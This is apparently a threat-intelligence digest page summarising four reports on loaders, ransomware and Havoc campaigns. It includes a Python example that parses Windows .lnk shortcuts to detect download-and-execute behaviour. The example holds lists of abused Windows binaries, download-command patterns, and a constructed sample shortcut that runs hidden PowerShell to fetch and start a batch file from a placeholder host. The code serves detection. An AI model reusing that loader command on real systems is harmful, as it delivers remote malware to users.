Tag: 2024-10-08
4 attack reports | 234 vulnerabilities
Attack reports
The Open-Source Builder Behind Malicious Loaders
MisterioLNK is a newly discovered open-source loader builder that generates LNK, BAT, CMD, and VBS loader files designed to download and execute remote files. Available on GitHub, it poses a significant challenge to security defenses due to minimal detection rates. The tool supports multiple loader…
Downloadable IOCs 0
Dark Angels Exposed
The Dark Angels ransomware group, active since April 2022, operates with sophisticated strategies targeting large companies for substantial ransom demands. They focus on stealthy attacks, avoiding outsourcing to third-party brokers. The group uses various ransomware payloads, including Babuk and Re…
Downloadable IOCs 0
Wreaking havoc in cyberspace: threat actors experiment with pentest tools
Recent research reveals that adversaries are increasingly using the Havoc post-exploitation framework to evade cybersecurity controls. Two campaigns utilizing this framework were analyzed. The first campaign involved phishing emails with malicious archives containing ISO files and LNK files, which downloade…
Downloadable IOCs 0
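Both the MisterioLNK entry (LNK/BAT/CMD/VBS loaders that download and execute a remote file) and the Havoc entry (ISO-delivered LNK files) turn on the same artefact: a Shell Link whose target and arguments point a LOLBin at a URL. The following is an added example, not code from either report or from the MisterioLNK project. It parses the `.lnk` header and StringData fields per MS-SHLLINK, then applies heuristics for download-and-execute behaviour. The LOLBin list, regexes, and the two sample `.lnk` blobs (built by `build_lnk`) are constructed here for illustration; the `assess_loader` and `parse_lnk` names are mine.

```python
"""Inspect a Windows Shell Link (.lnk) for download-and-execute loader behaviour.

Added example, not from the report or the MisterioLNK project. It parses the
ShellLinkHeader, skips LinkTargetIDList/LinkInfo, reads the StringData fields
(MS-SHLLINK 2.1 and 2.4), and applies simple heuristics to the command line.
The sample .lnk bytes are constructed below, not real malware artefacts.
"""
import re
import struct

HEADER_SIZE = 0x4C  # fixed ShellLinkHeader size
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags (MS-SHLLINK 2.1.1), low byte only
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
STRING_FIELDS = [  # StringData entries appear in this fixed order
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]


def _read_string(buf, off, unicode):
    """StringData entry: CountCharacters (u16) then chars, UTF-16LE if IsUnicode."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    width = 2 if unicode else 1
    raw = buf[off:off + count * width]
    if len(raw) != count * width:
        raise ValueError("truncated StringData")
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return text, off + count * width


def parse_lnk(buf):
    """Return the StringData fields present in a .lnk as a dict."""
    if len(buf) < HEADER_SIZE or buf[:4] != struct.pack("<I", HEADER_SIZE) or buf[4:20] != LINK_CLSID:
        raise ValueError("not a ShellLinkHeader")
    (flags,) = struct.unpack_from("<I", buf, 0x14)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (u16) followed by the IDList
        (size,) = struct.unpack_from("<H", buf, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:  # LinkInfoSize (u32) counts itself
        (size,) = struct.unpack_from("<I", buf, off)
        off += size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            fields[key], off = _read_string(buf, off, unicode)
    return fields


# Hosts loaders typically point the .lnk at, and download primitives they pass as arguments
# (illustrative lists, assumed for this example).
LOLBIN_HOSTS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "conhost", "forfiles")
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b"
    r"|net\.webclient|\bcurl\b|\bwget\b|bitsadmin|urlcache|\bmshta\b|start-bitstransfer",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b|/min\b|\bhidden\b", re.IGNORECASE)


def assess_loader(buf):
    """Tag a .lnk with loader indicators; 'suspicious' when a LOLBin both fetches and runs."""
    f = parse_lnk(buf)
    target = (f.get("relative_path", "") + " " + f.get("working_dir", "")).lower()
    args = f.get("arguments", "")
    tags = []
    if any(h in target or h in args.lower() for h in LOLBIN_HOSTS):
        tags.append("lolbin-host")
    if DOWNLOAD_RE.search(args):
        tags.append("download-primitive")
    if URL_RE.search(args):
        tags.append("embedded-url")
    if HIDDEN_RE.search(args):
        tags.append("hidden-window")
    suspicious = "lolbin-host" in tags and ("download-primitive" in tags or "embedded-url" in tags)
    return {"fields": f, "tags": tags, "suspicious": suspicious}


def build_lnk(relative_path, arguments, unicode=True):
    """Construct a minimal .lnk (header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes, times, sizes, reserved

    def enc(s):
        data = s.encode("utf-16-le") if unicode else s.encode("cp1252")
        return struct.pack("<H", len(s)) + data

    return header + enc(relative_path) + enc(arguments)


# Constructed samples (not real artefacts): a loader-style link and a benign one.
LOADER_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -ep bypass -c "iwr http://example.invalid/p.txt -OutFile $env:TEMP\\p.bat; '
    'Start-Process $env:TEMP\\p.bat"',
)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "notes.txt", unicode=False)

if __name__ == "__main__":
    for name, blob in (("loader", LOADER_LNK), ("benign", BENIGN_LNK)):
        r = assess_loader(blob)
        print(name, r["suspicious"], r["tags"])
```

Run against a directory of extracted attachments (or the contents of a mounted ISO) and triage anything tagged `lolbin-host` plus `download-primitive`; the `hidden-window` tag is a useful secondary signal. Real samples often carry a LinkTargetIDList and LinkInfo before the strings, which the parser skips by size, and the same `arguments` field is what a builder like MisterioLNK populates for its LNK output; BAT, CMD and VBS variants need a separate text-based check.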
Exploring GenAI in Cybersecurity: Gemini for Malware Analysis
This analysis explores the application of Generative AI, specifically Google's Gemini Advanced, in malware analysis. The experiment focuses on analyzing executable files, particularly a RisePro Stealer sample. The methodology involves decompiling the malware using Ghidra and IDA Pro, then using spe…
Downloadable IOCs 1